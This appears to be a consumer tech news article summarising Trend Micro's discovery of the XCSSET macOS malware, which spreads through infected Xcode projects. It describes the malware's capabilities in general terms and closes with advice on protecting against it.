The latest macOS malware was uncovered by security researchers at the antivirus vendor Trend Micro (opens in new tab). It is particularly clever in its implementation as the malicious code is being transmitted via Xcode projects, the development tool used to create apps for all Apple platforms (via PCMag).
MacBook with Apple Silicon: Release date, rumors, specs, and what we wantBest cheap MacBook deals of August 2020Apple Glass: Release date, design, features, price and more
The hackers created malicious code that is injected into local Xcode projects and runs when the project is built. It can be spread both via the Xcode projects themselves, something that has already been tracked to some projects shared via GitHub, as well as by the resulting apps.
How the XCSSET Malware works
The malware, according to the Trend Micro team, makes use of “two-zero day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.” This could allow it to carry out a number of dangerous behaviors including stealing information from your Evernote, Notes, Skype, Telegram, QQ and WeChat apps. It could capture screenshots from your system, upload files from your Mac to the hacker’s server, or encrypt files on your Mac and display a ransom note. Further actions that are theoretically possible given its ability to inject JavaScript code into Safari include modifying the websites that you are viewing, modifying or replacing cryptocurrency addresses, stealing payment credentials or credit card info, blocking or capturing passwords, and capturing screenshots of any sites visited. A full technical brief on what Trend Micro is calling the “XCSSET Malware” is available here (opens in new tab) for those interested in additional details.
How to protect yourself from the XCSSET Malware
One of Trend Micro’s primary messages was a warning for developers to check their projects to ensure that they are free from this problem. However, for consumers, the best way to protect yourself is to only download apps from either the App Store or trusted existing vendors’ sites. Beyond that, you should consider some form of antivirus protection that would be capable of detecting this kind of malware and helping to eliminate it from your system before it could cause any serious harm.